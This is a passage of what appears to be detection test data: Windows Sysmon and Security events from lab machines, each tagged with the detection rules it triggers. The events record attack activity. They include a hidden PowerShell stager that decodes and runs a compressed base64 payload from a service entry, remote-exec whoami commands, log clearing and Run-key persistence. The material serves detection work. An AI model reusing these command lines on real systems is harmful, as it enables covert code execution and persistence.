20:35:13.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9838,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.449839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ProcessId":1256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.512"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9839,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.512339Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ParentProcessId":1256,"ProcessGuid":"365ABB72-B181-5CC8-0000-00108DC71E00","ProcessId":692,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.527"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9840,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.543589Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC04.example.corp","Correlation":null,"EventID":1102,"EventRecordID":6272,"Execution_attributes":{"ProcessID":792,"ThreadID":3120},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:26:42.116688Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"PC04","SubjectLogonId":"0x128a9","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","DLL Load via LSASS"],"event":{"Event":{"EventData":{"Details":"\\\\172.16.66.254\\shared\\lsadb.dll","EventType":"SetValue","Image":"C:\\WINDOWS\\system32\\svchost.exe","ProcessGuid":"6A3C3EF2-E699-5F7C-0000-001048EF0000","ProcessId":404,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","UtcTime":"2020-10-06 22:11:17.814"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":13,"EventRecordID":345994,"Execution_attributes":{"ProcessID":10204,"ThreadID":2096},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-06T22:11:17.814931Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Hijack Legit RDP Session to Move Laterally","UAC 
Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-14 13:55:57.243","Image":"C:\\Windows\\system32\\mstsc.exe","ProcessGuid":"ECAD0485-C903-5CDA-0000-0010340F1000","ProcessId":2580,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cmd.exe","UtcTime":"2019-05-14 14:04:05.696"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":31145,"Execution_attributes":{"ProcessID":1580,"ThreadID":2324},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-14T14:04:05.697491Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\ProgramData\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-3991-5D0B-0000-002029350100","LogonId":"0x13529","ParentCommandLine":"\"cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-3ED4-5D0B-0000-0010B2871A00","ParentProcessId":1440,"ProcessGuid":"365ABB72-3ED8-5D0B-0000-0010398F1A00","ProcessId":1476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-20 08:07:52.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8119,"Execution_attributes":{"ProcessID":2020,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-20T08:07:52.956810Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k localService -p -s RemoteRegistry","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3407-5FCB-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2020-12-04 22:41:04.465"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549016,"Execution_attributes":{"ProcessID":3560,"ThreadID":4600},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-04T22:41:04.470207Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\Rundll32.exe smssvc.dll,Start","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SUpdate","UtcTime":"2020-12-04 
22:41:04.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":549018,"Execution_attributes":{"ProcessID":3560,"ThreadID":4600},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-12-04T22:41:04.545145Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9805,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:51.949839Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","PowerShell as a Service in Registry"],"event":{"Event":{"EventData":{"Details":"%%COMSPEC%% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c 
&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\ImagePath","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9806,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:51.981089Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Curl Start Combination","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ParentProcessId":460,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ProcessId":3348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.949"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9807,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.090464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Encoded 
FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ParentProcessId":3348,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.965"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9808,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.106089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"\"powershell.exe\" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ParentProcessId":3872,"ProcessGuid":"365ABB72-AF8C-5CC8-0000-001003361900","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 
20:26:52.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9809,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.356089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:53.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9812,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:53.199839Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Tool Execution"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-27 11:40:56.396","Image":"System","ProcessGuid":"B5CF5917-721E-5F46-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Windows\\PSEXESVC.exe","UtcTime":"2020-08-27 
11:40:56.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":11,"EventRecordID":263572,"Execution_attributes":{"ProcessID":2580,"ThreadID":4144},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-27T11:40:56.397086Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Service Start"],"event":{"Event":{"EventData":{"CommandLine":"C:\\WINDOWS\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\WINDOWS\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"B5CF5917-7237-5F46-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\WINDOWS\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"B5CF5917-7236-5F46-0000-001058880000","ParentProcessId":632,"ProcessGuid":"B5CF5917-9BC8-5F47-0000-001042AB2001","ProcessId":4320,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-27 
11:40:56.610"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":1,"EventRecordID":263573,"Execution_attributes":{"ProcessID":2580,"ThreadID":4144},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-27T11:40:56.625194Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-0B9E-5D1D-0000-00100BF40D00","ProcessId":3844,"RuleName":"Lateral Movement - New Named Pipe added to NullSession","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes","UtcTime":"2019-07-03 20:10:06.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8228,"Execution_attributes":{"ProcessID":112,"ThreadID":2084},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-03T20:10:06.475561Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
